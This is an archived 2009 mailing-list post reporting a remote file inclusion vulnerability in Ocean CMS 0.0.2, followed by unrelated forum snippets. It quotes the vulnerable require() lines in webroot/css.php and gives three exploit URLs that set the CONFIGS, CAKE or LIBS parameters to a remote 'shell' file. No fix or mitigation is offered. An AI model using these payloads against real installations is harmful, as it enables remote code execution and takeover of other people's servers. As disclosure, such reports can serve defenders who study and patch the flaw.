Ocean CMS 0.0.2 Remote File Inclusion Vulnerability

From: "Cru3l.b0y" <cru3l.b0y@xxxxxxxxx>
Date: Thu, 23 Jul 2009 08:16:44 +0430

Hi Dear,
I found a new bug. please publish it.
thank you
bet regards
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ Ocean CMS 0.0.2 Remote File Inclusion Vulnerability +
+ +
+ Discovered by Cru3l.b0y +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################################################################
AUTHOR : Cru3l.b0y
APPLICATION : Ocean CMS
VERSION : 0.0.2
DOWNLOAD : http://cakeforge.org/frs/download.php/113/OceanCMS.tar.bz
VENDOR : http://cakeforge.org/
###################################################################################################

Vulnerable Code :
###################################################################################################
/webroot/css.php

34 require(CONFIGS.'paths.php');
35 require(CAKE.'basics.php');
36 require(LIBS.'folder.php');

[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CONFIGS=shell
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?CAKE=shell
[+]Exploit: http://[t4rg3t]/[p4th]/webroot/css.php?LIBS=shell
###################################################################################################

Prev by Date: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability
Next by Date: LifeType 1.2.8 Remote File Inclusion Vulnerability
Previous by thread: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability
Next by thread: LifeType 1.2.8 Remote File Inclusion Vulnerability
Index(es):
- Date
- Thread

Relevant Pages

Re: WothLK 10 day trial
... advertising through Amazon. ... merchant who has a different set of terms and conditions. ... search results to specify the vendor - the only clue you have there is ... I can't even imagine the nightmare attempting to download that game ...
(alt.games.warcraft)
Re: Same update keeps installing every time
... > difference I can see is I do not have SystemRoot folder. ... > Regards Garry ... >> Copy Folders Download and DataStore to another location ... >> Double click Automatic Updates service and click START ...
(microsoft.public.windowsxp.security_admin)
Re: Black out on screen
... This is happening due to graphic card driver.You have to update the driver.Visit the manufacturer's website to download and intall the latest driver. ... retta wrote: ...
(microsoft.public.windowsxp.general)
Re: US car dealer software
... > As an application vendor, I always sell solutions.. ... I can't remember the last time I saw a TV ad for any database. ... Regards, ...
(comp.databases.pick)
Re: Download files without alerts by Excel VBA
... like you need automate the manual interaction with the web page of figure ... Regards, ... Tom Ogilvy ... > In fact there is no ditect link to download the file. ...
(microsoft.public.excel.programming)